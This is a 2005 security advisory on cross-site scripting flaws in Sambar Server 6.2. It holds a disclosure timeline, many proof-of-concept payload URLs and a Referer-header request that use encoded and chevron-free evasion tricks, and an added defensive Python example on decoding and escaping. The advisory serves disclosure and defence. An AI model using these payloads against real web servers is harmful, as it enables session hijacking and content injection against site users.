sambarXSS.txt

Reported 14 Aug 2005 by Jamie Fisher. Type: packetstorm. Source: packetstormsecurity.com

Security Vulnerability in Sambar Server 6.

- Sambar -   
AFFECTED PRODUCTS:  
==================   
Sambar Server 6.2   
http://www.sambar.com/   
  
OVERVIEW:   
=========  
Sambar is an all-in-one and fully functional Web, HTTP, HTTPS, Mail, IRC, Syslog, Proxy and FTP server.  
  
HISTORY:  
========  
17th April 2005 - First discovered  
17th April 2005 - Contacted vendor  
20th April 2005 - Vendor reply  
20th May 2005 - Patch available  
  
DETAILS:  
========  
Multiple XSS issues were found in the administrative interface.
In some instances Sambar Server version 6.2 does not correctly filter HTML code from user-supplied
input. A user can supply a specially crafted script that, when rendered by the application, causes arbitrary script to be executed in the victim's browser. The script originates from the site running the Sambar Server 6.2 software and therefore runs in the security context of that site.
  
ISSUE:  
======  
Crafted input causes the application to output what is known as a cross-site script. The script is rendered when a user visits the affected page served by the application.
EXAMPLE:  
========  
Standard XSS within the /search directory:  
==========================================  
1.
http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=10&query=Folder%name
2.
http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=10&query=Folder%name
3.
http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=20&query=Folder%20name
4.
http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=20&query=Folder%20name
5.
http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=30&query=Folder%20name
6.
http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=30&query=Folder%20name
7.
http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=40&query=Folder%20name
8.
http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=40&query=Folder%20name
9.
http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=50&query=Folder%20name
10.
http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=50&query=Folder%20name
11.
http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=60&query=Folder%20name
12.
http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=60&query=Folder%20name
Standard XSS within the /session directory:  
===========================================  
1.
http://192.168.0.5/session/logout?RCredirect=>'><script>alert('XSS')</script>
2.
http://192.168.0.5/session/logout?RCredirect=>"><script>alert("XSS")</script>
3.
http://192.168.0.5/session/logout?RCredirect=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>
HTML XSS within the /search directory:  
======================================  
1.
http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=10&query=Folder%20name
2.
http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=20&query=Folder%20name
3.
http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=30&query=Folder%20name
4.
http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=40&query=Folder%20name
5.
http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=50&query=Folder%20name
6.
http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=60&query=Folder%20name
No chevron '<' '>' XSS within the /search directory:  
====================================================  
1.  
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=10&query=Folder%20name  
2.  
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=20&query=Folder%20name  
3.  
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=30&query=Folder%20name  
4.  
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=40&query=Folder%20name  
5.  
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=50&query=Folder%20name  
6.  
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=60&query=Folder%20name  
Escaping from HTML XSS within the /session directory:  
====================================================  
1.
http://192.168.0.5/session/logout?RCredirect=--><script>alert(%27XSS%27)</script>
Including XSS within referrer:  
==============================  
1.  
GET /CheckingXssInReferer.html HTTP/1.0  
Cookie: RCuid=SS1-1113767443-uh287LUVlBbVwpESKaZ29/hq0cDSVneAgWlracaqApQ=; RCslb=5; RCrelogin=false  
Host: 192.168.0.5  
Accept: */*  
Accept-Language: en-us  
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)  
Referer: "></a><script>alert('XSS')</script>  
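The examples above share one root cause: parameter and header values are echoed into the page without contextual encoding, and several of the payloads (the HTML-entity-encoded javascript: URL, the attribute-breaking "no chevron" value, the comment-escape) only become visible once the value is decoded the way a browser decodes it. The following is an added example, not code from the advisory or from Sambar: it normalizes the advisory's own parameter values before checking them, and contrasts a constructed page template that echoes indexname verbatim with one that applies html.escape. The template is an assumption; the advisory does not show Sambar's actual page.

```python
import html
import re
from typing import List
from urllib.parse import unquote

# Parameter values taken from the advisory's example URLs (indexname,
# RCredirect and the Referer header), still in their on-the-wire encoding.
SAMPLES = {
    "benign":      "Folder%20name",
    "script_tag":  '>"><script>alert("XSS")</script>',
    "entity_js":   '>"\'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;'
                   '%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;'
                   'alert(%26quot;XSS%26quot;)>',
    "no_chevron":  '%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22',
    "comment_out": "--><script>alert(%27XSS%27)</script>",
    "referer":     "\"></a><script>alert('XSS')</script>",
}

def decoded(name: str) -> str:
    """The sample value as the server sees it after one URL-decode."""
    return unquote(SAMPLES[name])

def normalize(raw: str) -> str:
    """Undo the encodings a payload may hide behind before inspecting it:
    bounded repeated percent-decoding, then HTML entity resolution
    (&#x6a; -> 'j'), which is what the browser does when parsing the page."""
    s = raw
    for _ in range(3):
        step = unquote(s)
        if step == s:
            break
        s = step
    return html.unescape(s).lower()

MARKERS = ("<script", "javascript:", "-->", "onerror=", "onload=")

def xss_markers(raw: str) -> List[str]:
    """Markers present in the decoded value; an empty list means nothing flagged."""
    n = normalize(raw)
    return [m for m in MARKERS if m in n]

def render_unsafe(indexname: str) -> str:
    """Constructed stand-in for a results page echoing the parameter verbatim."""
    return f'<input name="indexname" value="{indexname}">'

def render_safe(indexname: str) -> str:
    """Same page with contextual output encoding: html.escape(quote=True)
    turns < > & " ' into entities, so the value cannot close the attribute."""
    return f'<input name="indexname" value="{html.escape(indexname, quote=True)}">'

def attribute_value(rendered: str) -> str:
    """The string a browser would assign to the input's value attribute."""
    m = re.search(r'value="([^"]*)"', rendered)
    return m.group(1) if m else ""

def value_survives(indexname: str) -> bool:
    """True when the safe renderer keeps the entire input inside the attribute."""
    return html.unescape(attribute_value(render_safe(indexname))) == indexname

if __name__ == "__main__":
    for name in SAMPLES:
        print(f"{name:12s} markers={xss_markers(SAMPLES[name])}")
    print("unsafe:", render_unsafe(decoded("no_chevron")))
    print("safe:  ", render_safe(decoded("no_chevron")))
```

Note that the raw entity_js value contains neither "<script" nor "javascript:"; a filter that inspects the undecoded string, or that only strips chevrons, misses it and the no-chevron case alike.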
  
SOLUTION:   
=========  
Sambar Server has been contacted and has released patches.   
Note: There were probably a lot more input validation errors, but due to a whining girlfriend work had to be cut short :)
  
REFERENCE:  
==========  
http://www.sambar.com/security.htm  
http://homepage.hispeed.ch/spamtrap/sambar62p.exe  
  
CREDITS:   
========  
Tod Sambar for understanding the issue and resolving in a timely manner.  
  
This vulnerability was discovered and researched by Jamie Fisher  
mail: contact_jamie_fisher[at]yahoo.co.uk  
  

Published: 14 Aug 2005. Vulners AI Score: 7.4 (High risk).